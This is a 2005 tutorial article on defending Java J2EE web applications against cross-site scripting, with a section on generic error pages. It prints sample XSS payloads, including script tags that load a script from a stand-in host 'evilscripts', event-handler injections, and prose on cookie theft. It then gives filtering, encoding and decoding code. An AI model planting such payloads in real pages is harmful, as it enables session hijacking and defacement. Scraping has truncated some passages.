Skip to main content

Handling Java Web Application Input, Part 2

September 20, 2005


Cross-Site Scripting
   Tags that Allow for Cross-Site Scripting
Threats Of Cross-Site Scripting
Preventing Cross-Site Scripting
Error Reporting

This is the second article in a series on handling Java web
application input. In "">
part one,
I talked about validation best practices and SQL
injection attacks. In this article, I will continue the theme, and
in particular will talk about the threat of cross-site scripting,
as well as looking at correctly handling exceptions in J2EE web

Cross-Site Scripting

Cross-site scripting, also known as XSS, is an attack against
dynamic applications. It occurs when an application ignorantly
accepts input containing units of instruction from an external
source. This input is then sent as part of the response to a
delivery medium such as a web browser, and may also be persisted to
a data store for future display. The success of such an attack is
heavily dependent on a web browser's facility to discern regular
content from instruction: markup and data. Let us consider a simple
example, shown in Figure 1, that allows the posting of movie

height="297" alt="Movie Review Example" name="figure5" />
Figure 1. Movie review example

Figure 1 shows a web page that allows a user to post a movie
review. Let us consider what would happen if a movie review was
posted containing some JavaScript code:

  <script> alert("Hello Script Injection"); </script> 

The possible result of this is shown in Figure 2.

height="297" alt="Script Injection Attack" name="figure6" />
Figure 2. Script injection attack

As you can see, this input results in the JavaScript scriptlet
being executed anytime a user requests the web page. In this case,
it displays a harmless alert window. An attacker initiates this
attack by interacting with the application, passing data through
HTML form input fields. This data is then sent to the web server
via a HTTP post request. On receipt, the web server passes this
request to the J2EE web container, which in turn parses the HTTP
request to extract pertinent data: HTTP headers, request data,
referrer URL, etc. This data is then used to construct a
javax.servlet.http.HttpServletRequest that provides a
programmer-friendly interface to this data. This object is then
used to retrieve the movie data, performing simple validation to
ensure required data has been set.

The problem with this approach is that the validation employed
does not protect against an XSS attack. This is due to the fact
that input data contains characters that are considered special
under the HTML specification. The HTML 4.0 specification includes
around 250 special characters. However, in relation to a XSS
attack, commonly used characters include <, >, &,
{, }, [, ], and %. An attacker can use these characters and
others to construct a series of attack strings that the receiving
web browser will interpret as units of instruction and execute

Now consider the following tag:

  <script type="text/javascript" src="http://evilscripts/js/evilScript.js" />

This results in the malicious script evilScript.js being
downloaded and executed. A similar attack looks like this:

  <script type="text/javascript">     

The result of this would be the user being redirected to
evilScriptPage.html on every load of the page.

An anchor can hide a script, too:

  <A HREF="
  <SCRIPT SRC='http://evilscripts/js/evilScript.js'></SCRIPT>">
  Go to Movies web site</A> 

This is a link that sends a user to and executes the
evilScript.js script.

There are also "inline" script attacks, which work in newer

  <body onload="javascript:alert('Hello Inline Script Attack');">

Finally, there are attacks that launch when the user mouses over

    src="images/example.gif" id="example"
    width="482" height="297" alt="example" />

This is an image that redirects a user to
http://evilscripts/js/evilScriptPage.html when the mouse is
placed over the image.

Tags that Allow for Cross-Site Scripting

Common exploits include the use of
Output: Writes "Hello JavaScript!" to the web page.

A script injection attack does not necessarily have to be
initiated with malicious intent. For example, a well-meaning user
could enter standard HTML markup and alter page formatting,
seriously defacing the look of a website.

Threats Of Cross-Site Scripting

The exploits achieved through script injection vary across a
large spectrum. This is due to the nature of the attack: any website that provides a facility for an attacker to insert
instructions into a web page opens an application up to a variety
of attacks, causing serious ramifications. An exploit is heavily
dependent on the environment in which the malicious code executes,
such as the privileges granted under the account that the
application runs and the program language used. Some common
exploits achieved through cross-site scripting include:

  • The attacker can steal cookies, inserting a script into a web page
    of a vulnerable website. This script collects user cookies and then
    sends them to the attacker. The attacker can then impersonate a
    user (which is particularly dangerous in a single-sign-in
    environment), possibly gaining access to sensitive data such as
    credit card numbers and passwords.
  • The attacker can insert a malicious link into a popular website, usually encoding it to make it difficult to discern from a
    well-meaning link; when a user clicks on the link, a malicious
    script is executed. A link could also be used to redirect a user to
    a malicious web page that takes on the appearance of a trusted
    site, possibly requesting security credentials.
  • User input may be intercepted. An attacker could write a script
    that monitors user input and sends sensitive data back to the
  • An attacker can trick the web server into executing malicious
    code in the same context as trusted code. This can give the
    attacker access to the web server and possibly, network access.
  • An attacker can deface a website, rendering it unreadable or
    adding any content they see fit.
  • An attacker can use the application logger to inject malicious
    input into the application. This input can be executed if logs are
    viewed in HTML form. Therefore, a good security practice is to wrap
    the application logger using a custom implementation that filters
    malicious input.

Preventing Cross-Site Scripting

One approach to achieving prevention is to configure the web
browser to disable scripting. Unfortunately, this is not always a
viable option as it affects functionality and, worse, relies on
autonomous configuration. Therefore we need to plug in some
validation code. However, before banging out any code, it is
important to understand that an attacker will take measures to
evade any validation code, testing for the possibility of dangerous
special characters. This will normally be carried out by using
numeric character references such as hexadecimal and decimal, or
character entity references of special characters for a particular
, like the following:

Char < > " : { } [ ] ;
Hex Char Code %3c %3e %22 %3a %7b %7d %5b %5d %3b

In order to be able detect special characters, it is vital that
the web server explicitly set the character set of any web page.
If the character set is not explicitly set in the HTML output, an
attacker can set a different character set. An attacker can then
pass malicious content containing special characters in a different
encoding, which the validation code cannot recognize, rendering it
obsolete. The character set of a web page can be set by specifying
the meta tag in the head section of an
HTML page:

        <META http-equiv="Content-Type"
        content="text/html; charset=ISO-8859-1">

The above declaration sets the character set to the Latin
character set necessary for typing Western European languages. It
is therefore important, when writing validation code, to be aware of
what character set is being used in order to correctly recognize
special characters.

Once this is set, the next step is to craft some validation
code. When writing this code, it is critical to understand that
every application is different (different internationalization
requirements, etc.) and secure coding practices that protect one
application may not protect another. Therefore, before writing any
code, it is important to play the role of the attacker, looking for
any entry points from which data is input from an unknown source.
One these points have being identified, it is important to construct
attack strings in order to understand how your application can be
exploited. When it comes to writing some validation code there are
two main choices: filtering and encoding.


The safest and perhaps most performant method of preventing
against attack is to only accept data that is deemed valid and
reject everything else, possibly returning an error to the client.
For example, if the input data is expected to be numeric, then
ensure that this is the case by rejecting any input that is

  final String inputStr = request.getParameter("input");
  final String numericPattern = "^\\d+$";
  if (!inputStr.matches(numericPattern))
        /* invalid input, do something with error*/

Although this is the best form of prevention and would work well
for the movie review example, it may not be practical to reject all
data. In this case, a cleaning routine can be used, which checks for
the existence of special characters and replaces each with another
character, such as a space.

  /* regular expression that 
   * tests for the existence of malicious characters 
   * and replaces them with a space. */
  final String filterPattern="[<>{}\\[\\];\\&]";
  String inputStr = s.replaceAll(filterPattern," ");


In certain situations, it is not viable to reject certain input.
For example, consider an online forum that allows programmers to
post code. If code is filtered, it will not display correctly,
making messages difficult to understand. In this case, we cannot
apply filtering and need an alternative approach.

One such approach is to encode the data. Encoding transforms
harmful characters into their display equivalents by using
character entity references or numeric character references. For
example, < and > will be transformed into < and
> respectively. However, when applying this approach, it is
important to set the character set of the response, as shown
earlier. This is needed due to the way in which the web server and
the web browser interact when sending data over the wire. When a web
server needs to send characters to a browser, it needs to convert
them into a series of bytes. When the browser receives these bytes,
it needs to convert them back into a stream of characters. The
Charset header specifies how this conversion is done.
Likewise, when you write dynamic content using a JSP or in a
servlet using response.getWriter(), the web container
converts strings into bytes using the specified character set. When
encoding is used, the character references generated by the
encoding routine are sent over the wire as special byte sequences
regulated by the particular character set. If the character set is
not set, when the web browser receives the stream of bytes, it may
use a different character set to transform the data into a
character stream. This makes it possible that during the
transformation process, encoded characters may be transformed into
special characters. The different character sets use different byte
sequences to represent characters, and this destroys your encoding

This code is a simple routine that encodes any input passed
to it for display in a web browser into its equivalent form, using
decimal character references:

  public static String encode(String data)
        final StringBuffer buf = new StringBuffer();
        final char[] chars = data.toCharArray();
        for (int i = 0; i < chars.length; i++) 
                buf.append("&#" + (int) chars[i]);

        return buf.toString();


For example, passing:

    <script> alert("Hello Script Injection"); </script> 

Is transformed into:


This enables the browser to treat it as a harmless string and
not as executable content. The "">JSP Standard Tag
(JSTL) provides similar functionality, by providing the
standard out tag, which encodes various HTML special
characters using character entity references. An important
consideration when using encoding is that it can incur a
performance penalty. Furthermore, as stated earlier, an attacker
may enter a different representation of special characters when
sending the data to the server (such as using a hexadecimal
representation). As a result, data should be decoded before encoding

  public static String decodeHex(final String data,
                                 final String charEncoding) 
    if (data == null) 
        return null;    
    byte[] inBytes = null;  
        inBytes = data.getBytes(charEncoding); 
    catch (UnsupportedEncodingException e) 
        //use default charset
        inBytes = data.getBytes(); 
    byte[] outBytes = new byte[inBytes.length]; 

    int b1;
    int b2;
    int j=0;
    for (int i = 0; i < inBytes.length; i++) 
        if (inBytes[i] == '%') 
            b1 = Character.digit((char) inBytes[++i], 16); 
            b2 = Character.digit((char) inBytes[++i], 16); 

            outBytes[j++] = (byte) (((b1 & 0xf) << 4) + 
                    (b2 & 0xf)); 
            outBytes[j++] = inBytes[i]; 
    String encodedStr = null;
        encodedStr = new String(outBytes, 0, j, charEncoding); 
    catch (UnsupportedEncodingException e) 
        encodedStr = new String(outBytes, 0, j); 

    return encodedStr; 


The above code is used to decode any hexadecimal-encoded
characters. It accepts a string containing the data to decode, along
with the character set to decode the data to (such as UTF-8, 8859_1,

An important decision is where to apply the validation
techniques. The two main places where this is commonly done are on
receipt of the request or when writing the response. It is
generally a good idea to apply both, and the decision to do so will
depend on the specific requirements of the application. Any input
data should be validated on receipt, ensuring that it is of the required
type whenever possible. Encoding should be performed when writing
the response. A good practice for doing this in a JSP page is to
use a custom tag. This is due to the fact that data does not
necessarily have to be input via the web application. Data can be
input into an application via a number of different methods:
through logging, entered directly into a database, etc.

Error Reporting

During the process of conducting an attack, an attacker will
usually pass some input that will result in a web server returning
an error. A poorly designed error-handling infrastructure will
allow an attacker to learn more about the system they are trying to
exploit. An attacker can use this newfound knowledge to trigger a
stronger attack the next time around. Therefore, it is critical to
limit the information returned.

A best practice for handling this kind of situation is to return
a generic error message to the client and log the error, including
any resultant exceptions and the corresponding stack traces, to the
application log file, possibly emailing a system administrator if
persistent error conditions occur. A J2EE-compliant web container
provides a nice fit for this scenario, using declarative error
handling through the error-page element of the
application deployment descriptor web.xml. The
error-page element allows you to map HTTP response
codes (such as 500 Internal Server Error and 404 Not Found), as
well as thrown exceptions, to a specific error-handling page:

  <!-- Maps the 404 Not Found response code
    to the error page /errPage404 -->
   <!-- Maps any thrown ServletExceptions
    to the error page /errPageServ -->
   <!-- Maps any other thrown exceptions
   to a generic error page /errPageGeneric -->


The element is used to specify the
resource (servlet, JSP, etc.) that will handle an error when thrown, the element specifies the error
code to be handled, and the
element specifies the exception to be handled. For instance, in the
above example, any error that is sent with the error code 404 will
be intercepted by the web container and forwarded to the resource
located at /errPage404. Likewise, any exception that is thrown that
is not an instance of javax.servlet.ServletException
will be also forwarded. The exception and error code can be
retrieved by a servlet handling the error using:

  Throwable throwable = (Throwable)

  String status_code = ((Integer)
    "javax.servlet.error.status_code")).toString( );

The error details can then be logged to a log file, and a
generic error message can be returned to the client that contains
no specific error details or stack traces that would aid an


In this series, we looked at the importance of handling
application input correctly. In particular, we looked at validation
best practices as well as the threats of SQL injection and cross-site scripting. It is hoped that these articles have provided a
good starting point for J2EE developers, helping to understand and
appreciate the seriousness of the very real and dangerous threat
posed by inadequate data validation. The appearance of automated
tools and the incorporation of new features into the various
specifications and web browsers has resulted in attackers finding
new and innovative ways to exploit an application through
application input. An attacker can initiate an attack through a web
browser by constructing attack strings, sending them via a HTTP get
request through URL tampering, via a HTTP post request through HTML
forms, or by other means. It is therefore critical that any possibility
for data being input into an application from an external source is
carefully analyzed, and secure coding practices put in place to
meet the specific validation needs of an application in order to
neutralize any threats.


width="1" height="1" border="0" alt=" " />
Stephen Enright is a Dublin-based software engineer.